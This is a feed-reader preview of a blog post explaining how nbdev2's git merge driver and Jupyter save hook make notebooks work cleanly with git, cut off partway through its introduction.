    Jupyter notebooks don’t work with git by default. With nbdev2, the Jupyter+git problem has been totally solved. It provides a set of hooks which provide clean git diffs, solve most git conflicts automatically, and ensure that any remaining conflicts can be resolved entirely within the standard Jupyter notebook environment. To get started, follow the directions on Git-friendly Jupyter. Contents The Jupyter+git problem The solution The nbdev2 git merge driver The nbdev2 Jupyter save hook Background The result Postscript: other Jupyter+git tools ReviewNB An alternative solution: Jupytext nbdime The Jupyter+git problem Jupyter notebooks are a powerful tool for scientists, engineers, technical writers, students, teachers, and more. They provide an ideal notebook environment for interact…  ( 7 min )
2023-08-09T00:51:34.822Z osmosfeed 1.15.1